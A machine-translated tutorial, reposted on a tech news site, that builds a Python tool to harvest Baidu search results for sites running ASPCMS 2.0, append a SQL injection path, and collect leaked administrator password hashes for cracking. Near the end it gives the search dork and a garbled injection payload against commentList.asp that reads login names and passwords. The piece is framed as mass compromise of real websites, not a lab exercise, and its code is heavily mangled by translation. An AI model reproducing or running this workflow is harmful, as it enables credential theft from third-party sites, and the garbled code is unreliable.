How to use url Collector and exp Verification in Python 07/06 Update SLTechnology News&Howtos

How to use url Collector and exp Verification in Python

2025-07-06 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

This article shows you how to use url collector and exp verification in Python. The content is concise and easy to understand, which will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

Foreword:

In recent days, I have been sorting out various toolkits collected from everywhere, large and small, filled with more than a dozen gigabytes of hard drives, and inadvertently found a 0day from several years ago. On a whim, I tried it, but I didn't expect that it could still be used, but those sites were old and out of repair, and they were all out of repair. I found that the utilization rate was quite considerable, so I wanted to cooperate with url collector to write a batch exp script. Hence the article of today. Attached at the end of a cousin forum invitation code accidentally bought too much. First come, first served.

Start: environment, and usage modules:

Python3

Requests

Beautifulsuop

Hashlib

The old rule is to define the goal first.

We need to write a url collector to collect our target URL

We need to integrate our exp into it.

Let's take a look at the format of exp, which looks something like this:

Exp:xxx/xxx/xxx/xxx

Baidu keyword: xxxxxx

Use the method to add exp to the website to directly reveal the password of the management account.

Like this: www.baidu.com/xxx/xxx/xxxxxxxxx

PS: use this later instead of in our code

Put another effect picture. Yeah, that's it. Directly out the account password, ha.

Url acquisition module:

First of all, we need to write a url collector based on Baidu search. Let's first analyze the search method of Baidu.

Let's open Baidu and enter the search keyword here instead of mango.

You can see the wd parameter followed by our keyword, and we click on the second page to see which parameter is in control.

Okay, compared with the previous url, we will find that the pn parameter becomes 10. Similarly, when we open the third page and the fourth page, we find that the rule of page number is to add 10 to each page starting from 0. Here we change the pn parameter to 90 to see if it comes to page 10.

We can see that it has really become page 10, which proves that our idea is correct. We take out the URL as follows

Https://www.baidu.com/s?wd= Mango & pn=0

We can skip the things after the pn parameter here, which makes it a lot simpler.

Let's start writing code. We first need a main function to open our Baidu web page, and we use for loop to control the page number variable to open the content of each page.

First, open a page of the website, the code is as follows

Let's run it and find that the returned page looks like this and doesn't have what we want.

This is why, the reason is because Baidu has done anti-crawling, but don't worry, we just need to add headers parameters and request together. The modified code is as follows:

Def main (): url=' https://www.baidu.com/s?wd= Mango & pn=0'# definition url headers= {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Rv:60.0) Gecko/20100101 Firefox/60.0'} # here Baidu adds an anti-crawling mechanism, which needs to be verified by user_agent or an error r=requests.get (url=url,headers=headers) will be returned. # request the target URL soup=bs (r.contentjinlxml') # resolve the URL print soup using bs

In this way, you can see that the web page content has been returned successfully.

OK, let's add our loop so that he can traverse every web page. A simple crawler has been written, but nothing has been crawled. Code is attached first.

Import requestsfrom bs4 import BeautifulSoup as bs # here the module is named bs, and we call the aspect. Def main (): for i in range (0Pert 750 ~ (10)): # iterate the number of pages, increase 10 url=' https://www.baidu.com/s?wd= mango & pn=%s'% (str (I)) # define url headers= {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Rv:60.0) Gecko/20100101 Firefox/60.0'} # here Baidu adds an anti-crawling mechanism, which needs to be verified by user_agent or it will return an error r=requests.get (url=url,headers=headers) # request the target URL soup=bs (r. Content _ main__': main)) # use bs to resolve the URL print soupif _ _ name__ = ='_ main__': main () # call the function main

We continue to analyze the web page and take out each URL. Right-click the review element to see the location in the source code.

As you can see, for the data we want to fetch, in a tag named a, we use bs to pull out all the contents of the tag. And use the loop to retrieve the URL in the "href" attribute, the main function code is as follows.

Here to explain why there is this sentence class:none, if we do not add this sentence, we will find that we also got the address of Baidu snapshot. The class attribute has a value in the address of the snapshot, but we don't have the class attribute in our real link, so we don't get the link to the snapshot.

Run it. Successfully return the link we want

Our next step is to verify that these links are available, because some websites can still be searched, but they can no longer be opened. Here use the request module to request our link, and check to see if the returned status code is 200. if it is 200, it means that the website is normal and can be opened.

Add the following two lines of code to the for loop and run.

R_get_url=requests.get (url=url ['href'], headers=headers,timeout=4) # requests the crawled link and sets the timeout to 4 seconds. Print r_get_url.status_code

You can see that the success returns 200. Next, we will print out the address of the URL that can be accessed successfully, and only the home page URL of the website. We analyze a web site.

Https://www.xxx.com/xxx/xxxx/

Found that here are all split by "/", we can split the url with "/" and take out the URL we want to go to.

After running the program. You will find that some of them have directories when they return such URLs.

After we use / split url for the list, the first one in the list is the protocol used by the site, and the third is the home page of the URL we want to take. The code is as follows

Def main (): for i in range: url=' https://www.baidu.com/s?wd= Mango & pn=%s'% (str (I)) headers= {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Rv:60.0) Gecko/20100101 Firefox/60.0'} r=requests.get (url=url,headers=headers) soup=bs (r.contentrecoveringlxml`) urls=soup.find_all (name='a',attrs= {'data-click':re.compile (('.)), 'class':None}) # uses bs to pull out what we want, and the re module is designed to allow us to pull out all the contents of this tag. For url in urls: r_get_url=requests.get (url=url ['href'], headers=headers,timeout=4) # requests fetched links and sets the timeout to 4 seconds. If r_get_url.status_code==200:# determines whether the status code is 200url_para= r_get_url.url# to obtain the link url_index_tmp=url_para.split ('/') # with a status code of 2000.Segmentation url url_index=url_index_tmp [0] +'/ /'+ url_index_tmp [2] # will reassemble the segmented URL into a standard format. Print url_index

After running, we successfully take out the content we want to fetch.

OK, at this point, our main function has been realized. Let's enter our exciting time, join exp and take stations in batches.

Exp module

How to achieve this function, the principle is to add our exp after the link we crawled, splice it into a complete address, and take out the URL and save it in a txt text for us to verify. Now our code looks like this.

#-*-coding: UTF-8-*-import requestsimport refrom bs4 import BeautifulSoup as bsdef main (): for i in range: expp= ("/ xxx/xxx/xxx/xx/xxxx/xxx") url=' https://www.baidu.com/s?wd=xxxxxxxxx&pn=%s'%(str(i)) headers= {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Rv:60.0) Gecko/20100101 Firefox/60.0'} r=requests.get (url=url,headers=headers) soup=bs (r.contentmaidexmll') urls=soup.find_all (name='a',attrs= {'data-click':re.compile (('.')), 'class':None}) for url in urls: r_get_url=requests.get (url=url [' href'], headers=headers Timeout=4) if r_get_url.status_code==200: url_para= r_get_url.url url_index_tmp=url_para.split ('/') url_index=url_index_tmp [0] +'/ /'+ url_index_tmp [2] with open ('cs.txt') as f: if Url_index not in f.read (): # here is a judgment to remove weight Determine whether the URL is already in the text, and if it does not exist, open txt and write our spliced exp link. Print url_index f2=open ("cs.txt", 'asides') f2.write (url_index+expp+'\ n') f2.close () if _ _ name__ = ='_ main__': f2=open ('cs.txt','w') f2.close () main ()

Here I have replaced exp with xxx, so you can replace it by yourself. It's at the end.

Run our program, in the root directory, we can find a cs.txt text document, after opening it like this.

Typing is a little serious. However, it does not affect, small problems, as long as we understand, in fact, this is the end, we can manually verify, one by one to paste the visit, to see if there is any content we want. But, I am lazy, one by one to verify, when and what month.

Here we are creating a new py file to verify the link we grabbed in the previous step, so that we separate the two modules, and you can only use the function of the first url capture.

Our idea is to open the link we just collected and find out if there is any specific content on the web page. If so, the lecture link is saved in a file, which is the link that we verify can be used successfully.

Let's take a look at what a successful page looks like.

Take advantage of failed pages

We found that using the hash with administrator password in the successful page, here we use the hashlib module to determine whether there is MD5 on the page, print it out if there is any, and save the MD5 with the link in the text. Let's first analyze the source code of the website so that we can extract the content.

You can see that the site is very simple, we want to take the content in different attribute values, one for class:line1, one for class:line2. All we have to do is use the bs module to extract the contents of these two tags. The code is as follows.

#-*-coding: UTF-8-*-from bs4 import BeautifulSoup as bsimport requestsimport timeimport hashlibdef expp (): F = open ("cs.txt", "r") # Open the text document we just collected url=f.readlines () # take out our link line by line for i in url:# put the extracted link into the loop try:# add exception handling, let the error report be ignored directly Does not affect the program to run r=requests.get (itimeoutbound 5) # request URL if r.status_code = = 200 r.text # to determine whether the URL can be opened properly, we can remove this one. We have just verified that soup=bs (r.text, "lxml") # uses bp to parse the website if hashlib.md5:# to determine whether there is MD5 in the URL. If you continue to run mb1=soup.find_all (name= "div", attrs= {"class": "line1"}) [0] .text # to get line1 data mb2=soup.find_all (name= "div", attrs= {"class": "line2"}) [0] .text # to get line2 data f2=open ('cs2.txt' 'averse') # Open our text f2.write (I + "\ n" + mb1+ "\ n") # to our verified link And the data is saved in the text f2.close () print (mb1) print (mb2) except: pass f.close () expp ()

Run it:

Success, let's take a look at our files.

Perfect, and then we can go backstage and decrypt it, you know.

Exp: Baidu keyword: Ltd.-- Powered by ASPCMS 2.0 expexplux plugUnix plugUnix commentList.aspkeeper user 0% 20unmasterion% 20semasterlect% 20Topo% 201% 20UserID ID department LoginNamedPasswordnow% 28% 2929 nullList 1% 20% 20frmasterm% 20 {prefix} summary:

1. Complaining about the incompatibility of python2 with Chinese led me to switch to python3.

two。 The program is simple, but what matters is not the program, but the train of thought.

The above is how to use url collector and exp verification in Python. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.